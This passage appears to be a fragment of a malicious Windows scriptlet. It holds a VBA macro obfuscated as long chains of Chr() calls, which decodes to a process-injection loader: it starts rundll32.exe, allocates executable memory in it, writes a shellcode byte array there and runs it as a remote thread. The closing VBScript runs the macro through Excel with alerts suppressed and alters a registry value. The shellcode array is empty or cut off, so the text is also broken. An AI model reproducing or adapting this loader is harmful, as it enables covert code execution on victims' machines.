Chr(83)&Chr(116)&Chr(117)&Chr(102)&Chr(102)&Chr(32)&Chr(76)&Chr(105)&Chr(98)&Chr(32)&Chr(34)&Chr(107)&Chr(101)&Chr(114)&Chr(110)&Chr(101)&Chr(108)&Chr(51)&Chr(50)&Chr(34)&Chr(32)&Chr(65)&Chr(108)&Chr(105)&Chr(97)&Chr(115)&Chr(32)&Chr(34)&Chr(86)&Chr(105)&Chr(114)&Chr(116)& _
Chr(117)&Chr(97)&Chr(108)&Chr(65)&Chr(108)&Chr(108)&Chr(111)&Chr(99)&Chr(69)&Chr(120)&Chr(34)&Chr(32)&Chr(40)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(104)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)& _
Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(108)&Chr(112)&Chr(65)&Chr(100)&Chr(100)&Chr(114)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)& _
Chr(32)&Chr(108)&Chr(83)&Chr(105)&Chr(122)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(102)&Chr(108)&Chr(65)&Chr(108)&Chr(108)&Chr(111)&Chr(99)&Chr(97)&Chr(116)&Chr(105)& _
Chr(111)&Chr(110)&Chr(84)&Chr(121)&Chr(112)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(102)&Chr(108)&Chr(80)&Chr(114)&Chr(111)&Chr(116)&Chr(101)&Chr(99)&Chr(116)&Chr(32)& _
Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(41)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(68)&Chr(101)&Chr(99)& _
Chr(108)&Chr(97)&Chr(114)&Chr(101)&Chr(32)&Chr(70)&Chr(117)&Chr(110)&Chr(99)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(32)&Chr(87)&Chr(114)&Chr(105)&Chr(116)&Chr(101)&Chr(83)&Chr(116)&Chr(117)&Chr(102)&Chr(102)&Chr(32)&Chr(76)&Chr(105)&Chr(98)&Chr(32)&Chr(34)&Chr(107)&Chr(101)& _
Chr(114)&Chr(110)&Chr(101)&Chr(108)&Chr(51)&Chr(50)&Chr(34)&Chr(32)&Chr(65)&Chr(108)&Chr(105)&Chr(97)&Chr(115)&Chr(32)&Chr(34)&Chr(87)&Chr(114)&Chr(105)&Chr(116)&Chr(101)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(77)&Chr(101)&Chr(109)&Chr(111)&Chr(114)& _
Chr(121)&Chr(34)&Chr(32)&Chr(40)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(104)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)& _
Chr(108)&Chr(32)&Chr(108)&Chr(68)&Chr(101)&Chr(115)&Chr(116)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(82)&Chr(101)&Chr(102)&Chr(32)&Chr(83)&Chr(111)&Chr(117)&Chr(114)&Chr(99)&Chr(101)&Chr(32)&Chr(65)&Chr(115)& _
Chr(32)&Chr(65)&Chr(110)&Chr(121)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(76)&Chr(101)&Chr(110)&Chr(103)&Chr(116)&Chr(104)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)& _
Chr(108)&Chr(32)&Chr(76)&Chr(101)&Chr(110)&Chr(103)&Chr(116)&Chr(104)&Chr(87)&Chr(114)&Chr(111)&Chr(116)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(41)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(32)& _
Chr(32)&Chr(32)&Chr(32)&Chr(80)&Chr(114)&Chr(105)&Chr(118)&Chr(97)&Chr(116)&Chr(101)&Chr(32)&Chr(68)&Chr(101)&Chr(99)&Chr(108)&Chr(97)&Chr(114)&Chr(101)&Chr(32)&Chr(70)&Chr(117)&Chr(110)&Chr(99)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(32)&Chr(82)&Chr(117)&Chr(110)&Chr(83)& _
Chr(116)&Chr(117)&Chr(102)&Chr(102)&Chr(32)&Chr(76)&Chr(105)&Chr(98)&Chr(32)&Chr(34)&Chr(107)&Chr(101)&Chr(114)&Chr(110)&Chr(101)&Chr(108)&Chr(51)&Chr(50)&Chr(34)&Chr(32)&Chr(65)&Chr(108)&Chr(105)&Chr(97)&Chr(115)&Chr(32)&Chr(34)&Chr(67)&Chr(114)&Chr(101)&Chr(97)&Chr(116)& _
Chr(101)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(65)&Chr(34)&Chr(32)&Chr(40)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(108)&Chr(112)&Chr(65)&Chr(112)&Chr(112)&Chr(108)&Chr(105)&Chr(99)&Chr(97)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(78)& _
Chr(97)&Chr(109)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(108)&Chr(112)&Chr(67)&Chr(111)&Chr(109)&Chr(109)&Chr(97)&Chr(110)&Chr(100)&Chr(76)&Chr(105)& _
Chr(110)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(108)&Chr(112)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(65)&Chr(116)&Chr(116)&Chr(114)&Chr(105)&Chr(98)&Chr(117)&Chr(116)&Chr(101)& _
Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(65)&Chr(110)&Chr(121)&Chr(44)&Chr(32)&Chr(108)&Chr(112)&Chr(84)&Chr(104)&Chr(114)&Chr(101)&Chr(97)&Chr(100)&Chr(65)&Chr(116)&Chr(116)&Chr(114)&Chr(105)&Chr(98)&Chr(117)&Chr(116)&Chr(101)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)& _
Chr(65)&Chr(110)&Chr(121)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(98)&Chr(73)&Chr(110)&Chr(104)&Chr(101)&Chr(114)&Chr(105)&Chr(116)&Chr(72)&Chr(97)&Chr(110)&Chr(100)&Chr(108)&Chr(101)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)& _
Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(100)&Chr(119)&Chr(67)&Chr(114)&Chr(101)&Chr(97)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(70)&Chr(108)&Chr(97)&Chr(103)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)& _
Chr(103)&Chr(44)&Chr(32)&Chr(108)&Chr(112)&Chr(69)&Chr(110)&Chr(118)&Chr(105)&Chr(114)&Chr(111)&Chr(110)&Chr(109)&Chr(101)&Chr(110)&Chr(116)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(65)&Chr(110)&Chr(121)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(108)& _
Chr(112)&Chr(67)&Chr(117)&Chr(114)&Chr(114)&Chr(101)&Chr(110)&Chr(116)&Chr(68)&Chr(114)&Chr(105)&Chr(101)&Chr(99)&Chr(116)&Chr(111)&Chr(114)&Chr(121)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(108)&Chr(112)&Chr(83)& _
Chr(116)&Chr(97)&Chr(114)&Chr(116)&Chr(117)&Chr(112)&Chr(73)&Chr(110)&Chr(102)&Chr(111)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(84)&Chr(65)&Chr(82)&Chr(84)&Chr(85)&Chr(80)&Chr(73)&Chr(78)&Chr(70)&Chr(79)&Chr(44)&Chr(32)&Chr(108)&Chr(112)&Chr(80)&Chr(114)&Chr(111)& _
Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(73)&Chr(110)&Chr(102)&Chr(111)&Chr(114)&Chr(109)&Chr(97)&Chr(116)&Chr(105)&Chr(111)&Chr(110)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(80)&Chr(82)&Chr(79)&Chr(67)&Chr(69)&Chr(83)&Chr(83)&Chr(95)&Chr(73)&Chr(78)&Chr(70)&Chr(79)&Chr(82)& _
Chr(77)&Chr(65)&Chr(84)&Chr(73)&Chr(79)&Chr(78)&Chr(41)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(35)&Chr(69)&Chr(110)&Chr(100)&Chr(32)&Chr(73)&Chr(102)&Chr(10)&Chr(10)&Chr(83)&Chr(117)&Chr(98)&Chr(32)&Chr(65)&Chr(117)&Chr(116)& _
Chr(111)&Chr(95)&Chr(79)&Chr(112)&Chr(101)&Chr(110)&Chr(40)&Chr(41)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(68)&Chr(105)&Chr(109)&Chr(32)&Chr(109)&Chr(121)&Chr(66)&Chr(121)&Chr(116)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)& _
Chr(32)&Chr(109)&Chr(121)&Chr(65)&Chr(114)&Chr(114)&Chr(97)&Chr(121)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(86)&Chr(97)&Chr(114)&Chr(105)&Chr(97)&Chr(110)&Chr(116)&Chr(44)&Chr(32)&Chr(111)&Chr(102)&Chr(102)&Chr(115)&Chr(101)&Chr(116)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)& _
Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(68)&Chr(105)&Chr(109)&Chr(32)&Chr(112)&Chr(73)&Chr(110)&Chr(102)&Chr(111)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(80)&Chr(82)&Chr(79)&Chr(67)&Chr(69)&Chr(83)&Chr(83)&Chr(95)&Chr(73)&Chr(78)&Chr(70)& _
Chr(79)&Chr(82)&Chr(77)&Chr(65)&Chr(84)&Chr(73)&Chr(79)&Chr(78)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(68)&Chr(105)&Chr(109)&Chr(32)&Chr(115)&Chr(73)&Chr(110)&Chr(102)&Chr(111)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(84)&Chr(65)&Chr(82)&Chr(84)&Chr(85)& _
Chr(80)&Chr(73)&Chr(78)&Chr(70)&Chr(79)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(68)&Chr(105)&Chr(109)&Chr(32)&Chr(115)&Chr(78)&Chr(117)&Chr(108)&Chr(108)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)&Chr(10)&Chr(32)&Chr(32)& _
Chr(32)&Chr(32)&Chr(68)&Chr(105)&Chr(109)&Chr(32)&Chr(115)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)&Chr(10)&Chr(10)&Chr(35)&Chr(73)&Chr(102)&Chr(32)&Chr(86)&Chr(66)&Chr(65)&Chr(55)&Chr(32)& _
Chr(84)&Chr(104)&Chr(101)&Chr(110)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(68)&Chr(105)&Chr(109)&Chr(32)&Chr(114)&Chr(119)&Chr(120)&Chr(112)&Chr(97)&Chr(103)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)&Chr(44)& _
Chr(32)&Chr(114)&Chr(101)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)&Chr(10)&Chr(35)&Chr(69)&Chr(108)&Chr(115)&Chr(101)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(68)&Chr(105)&Chr(109)&Chr(32)&Chr(114)&Chr(119)& _
Chr(120)&Chr(112)&Chr(97)&Chr(103)&Chr(101)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(114)&Chr(101)&Chr(115)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(35)&Chr(69)&Chr(110)&Chr(100)&Chr(32)& _
Chr(73)&Chr(102)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(109)&Chr(121)&Chr(65)&Chr(114)&Chr(114)&Chr(97)&Chr(121)&Chr(32)&Chr(61)&Chr(32)& _
	
Chr(10)&Chr(9)&Chr(73)&Chr(102)&Chr(32)&Chr(76)&Chr(101)&Chr(110)&Chr(40)&Chr(69)&Chr(110)&Chr(118)&Chr(105)&Chr(114)&Chr(111)&Chr(110)&Chr(40)&Chr(34)&Chr(80)&Chr(114)&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)&Chr(87)&Chr(54)&Chr(52)&Chr(51)&Chr(50)&Chr(34)& _
Chr(41)&Chr(41)&Chr(32)&Chr(62)&Chr(32)&Chr(48)&Chr(32)&Chr(84)&Chr(104)&Chr(101)&Chr(110)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(10)&Chr(9)&Chr(9)&Chr(115)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(32)&Chr(61)&Chr(32)&Chr(69)& _
Chr(110)&Chr(118)&Chr(105)&Chr(114)&Chr(111)&Chr(110)&Chr(40)&Chr(34)&Chr(119)&Chr(105)&Chr(110)&Chr(100)&Chr(105)&Chr(114)&Chr(34)&Chr(41)&Chr(32)&Chr(38)&Chr(32)&Chr(34)&Chr(92)&Chr(83)&Chr(121)&Chr(115)&Chr(87)&Chr(79)&Chr(87)&Chr(54)&Chr(52)&Chr(92)& _
Chr(114)&Chr(117)&Chr(110)&Chr(100)&Chr(108)&Chr(108)&Chr(51)&Chr(50)&Chr(46)&Chr(101)&Chr(120)&Chr(101)&Chr(34)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(10)&Chr(9)&Chr(69)&Chr(108)&Chr(115)&Chr(101)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(32)& _
Chr(32)&Chr(10)&Chr(9)&Chr(9)&Chr(115)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(32)&Chr(61)&Chr(32)&Chr(69)&Chr(110)&Chr(118)&Chr(105)&Chr(114)&Chr(111)&Chr(110)&Chr(40)&Chr(34)&Chr(119)&Chr(105)&Chr(110)&Chr(100)&Chr(105)&Chr(114)&Chr(34)&Chr(41)&Chr(32)& _
Chr(38)&Chr(32)&Chr(34)&Chr(92)&Chr(83)&Chr(121)&Chr(115)&Chr(116)&Chr(101)&Chr(109)&Chr(51)&Chr(50)&Chr(92)&Chr(114)&Chr(117)&Chr(110)&Chr(100)&Chr(108)&Chr(108)&Chr(51)&Chr(50)&Chr(46)&Chr(101)&Chr(120)&Chr(101)&Chr(34)&Chr(32)&Chr(32)&Chr(10)&Chr(9)&Chr(69)& _
Chr(110)&Chr(100)&Chr(32)&Chr(73)&Chr(102)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(10)&Chr(10)&Chr(9)&Chr(114)&Chr(101)&Chr(115)&Chr(32)&Chr(61)&Chr(32)&Chr(82)&Chr(117)&Chr(110)&Chr(83)&Chr(116)&Chr(117)&Chr(102)&Chr(102)&Chr(40)&Chr(115)&Chr(78)&Chr(117)& _
Chr(108)&Chr(108)&Chr(44)&Chr(32)&Chr(115)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(48)&Chr(38)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(48)&Chr(38)&Chr(44)& _
Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(49)&Chr(38)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(52)&Chr(38)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(48)&Chr(38)&Chr(44)&Chr(32)& _
Chr(115)&Chr(78)&Chr(117)&Chr(108)&Chr(108)&Chr(44)&Chr(32)&Chr(115)&Chr(73)&Chr(110)&Chr(102)&Chr(111)&Chr(44)&Chr(32)&Chr(112)&Chr(73)&Chr(110)&Chr(102)&Chr(111)&Chr(41)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(10)&Chr(9)&Chr(114)&Chr(119)&Chr(120)&Chr(112)& _
Chr(97)&Chr(103)&Chr(101)&Chr(32)&Chr(61)&Chr(32)&Chr(65)&Chr(108)&Chr(108)&Chr(111)&Chr(99)&Chr(83)&Chr(116)&Chr(117)&Chr(102)&Chr(102)&Chr(40)&Chr(112)&Chr(73)&Chr(110)&Chr(102)&Chr(111)&Chr(46)&Chr(104)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)& _
Chr(115)&Chr(44)&Chr(32)&Chr(48)&Chr(44)&Chr(32)&Chr(85)&Chr(66)&Chr(111)&Chr(117)&Chr(110)&Chr(100)&Chr(40)&Chr(109)&Chr(121)&Chr(65)&Chr(114)&Chr(114)&Chr(97)&Chr(121)&Chr(41)&Chr(44)&Chr(32)&Chr(38)&Chr(72)&Chr(49)&Chr(48)&Chr(48)&Chr(48)&Chr(44)& _
Chr(32)&Chr(38)&Chr(72)&Chr(52)&Chr(48)&Chr(41)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(10)&Chr(10)&Chr(9)&Chr(70)&Chr(111)&Chr(114)&Chr(32)&Chr(111)&Chr(102)&Chr(102)&Chr(115)&Chr(101)&Chr(116)&Chr(32)&Chr(61)&Chr(32)&Chr(76)&Chr(66)&Chr(111)&Chr(117)&Chr(110)& _
Chr(100)&Chr(40)&Chr(109)&Chr(121)&Chr(65)&Chr(114)&Chr(114)&Chr(97)&Chr(121)&Chr(41)&Chr(32)&Chr(84)&Chr(111)&Chr(32)&Chr(85)&Chr(66)&Chr(111)&Chr(117)&Chr(110)&Chr(100)&Chr(40)&Chr(109)&Chr(121)&Chr(65)&Chr(114)&Chr(114)&Chr(97)&Chr(121)&Chr(41)& _
Chr(10)&Chr(9)&Chr(9)&Chr(109)&Chr(121)&Chr(66)&Chr(121)&Chr(116)&Chr(101)&Chr(32)&Chr(61)&Chr(32)&Chr(109)&Chr(121)&Chr(65)&Chr(114)&Chr(114)&Chr(97)&Chr(121)&Chr(40)&Chr(111)&Chr(102)&Chr(102)&Chr(115)&Chr(101)&Chr(116)&Chr(41)&Chr(32)&Chr(32)&Chr(32)& _
Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(10)&Chr(9)&Chr(9)&Chr(114)&Chr(101)&Chr(115)&Chr(32)&Chr(61)&Chr(32)&Chr(87)&Chr(114)&Chr(105)&Chr(116)&Chr(101)&Chr(83)&Chr(116)&Chr(117)&Chr(102)&Chr(102)&Chr(40)&Chr(112)&Chr(73)&Chr(110)&Chr(102)&Chr(111)&Chr(46)& _
Chr(104)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(44)&Chr(32)&Chr(114)&Chr(119)&Chr(120)&Chr(112)&Chr(97)&Chr(103)&Chr(101)&Chr(32)&Chr(43)&Chr(32)&Chr(111)&Chr(102)&Chr(102)&Chr(115)&Chr(101)&Chr(116)&Chr(44)&Chr(32)&Chr(109)& _
Chr(121)&Chr(66)&Chr(121)&Chr(116)&Chr(101)&Chr(44)&Chr(32)&Chr(49)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(48)&Chr(38)&Chr(41)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(10)&Chr(9)&Chr(78)&Chr(101)&Chr(120)&Chr(116)&Chr(32)&Chr(111)& _
Chr(102)&Chr(102)&Chr(115)&Chr(101)&Chr(116)&Chr(10)&Chr(10)&Chr(9)&Chr(114)&Chr(101)&Chr(115)&Chr(32)&Chr(61)&Chr(32)&Chr(67)&Chr(114)&Chr(101)&Chr(97)&Chr(116)&Chr(101)&Chr(83)&Chr(116)&Chr(117)&Chr(102)&Chr(102)&Chr(40)&Chr(112)&Chr(73)&Chr(110)& _
Chr(102)&Chr(111)&Chr(46)&Chr(104)&Chr(80)&Chr(114)&Chr(111)&Chr(99)&Chr(101)&Chr(115)&Chr(115)&Chr(44)&Chr(32)&Chr(48)&Chr(44)&Chr(32)&Chr(48)&Chr(44)&Chr(32)&Chr(114)&Chr(119)&Chr(120)&Chr(112)&Chr(97)&Chr(103)&Chr(101)&Chr(44)&Chr(32)&Chr(48)&Chr(44)& _
Chr(32)&Chr(48)&Chr(44)&Chr(32)&Chr(48)&Chr(41)&Chr(10)&Chr(10)&Chr(69)&Chr(110)&Chr(100)&Chr(32)&Chr(83)&Chr(117)&Chr(98)&Chr(10)&Chr(83)&Chr(117)&Chr(98)&Chr(32)&Chr(65)&Chr(117)&Chr(116)&Chr(111)&Chr(79)&Chr(112)&Chr(101)&Chr(110)&Chr(40)&Chr(41)&Chr(10)& _
Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(65)&Chr(117)&Chr(116)&Chr(111)&Chr(95)&Chr(79)&Chr(112)&Chr(101)&Chr(110)&Chr(10)&Chr(69)&Chr(110)&Chr(100)&Chr(32)&Chr(83)&Chr(117)&Chr(98)&Chr(10)&Chr(10)&Chr(83)&Chr(117)&Chr(98)&Chr(32)&Chr(87)&Chr(111)&Chr(114)& _
Chr(107)&Chr(98)&Chr(111)&Chr(111)&Chr(107)&Chr(95)&Chr(79)&Chr(112)&Chr(101)&Chr(110)&Chr(40)&Chr(41)&Chr(10)&Chr(32)&Chr(32)&Chr(32)&Chr(32)&Chr(65)&Chr(117)&Chr(116)&Chr(111)&Chr(95)&Chr(79)&Chr(112)&Chr(101)&Chr(110)&Chr(10)&Chr(69)&Chr(110)&Chr(100)& _
Chr(32)&Chr(83)&Chr(117)&Chr(98)&

objExcel.DisplayAlerts = False
on error resume next
objExcel.Run "Auto_Open"
objWorkbook.Close False
objExcel.Quit

' Restore the registry to its old state	
if action = "" then
	WshShell.RegDelete RegPath
else
	WshShell.RegWrite RegPath, action, "REG_DWORD"
end if
		]]>
		</script>
	</registration>
</scriptlet>
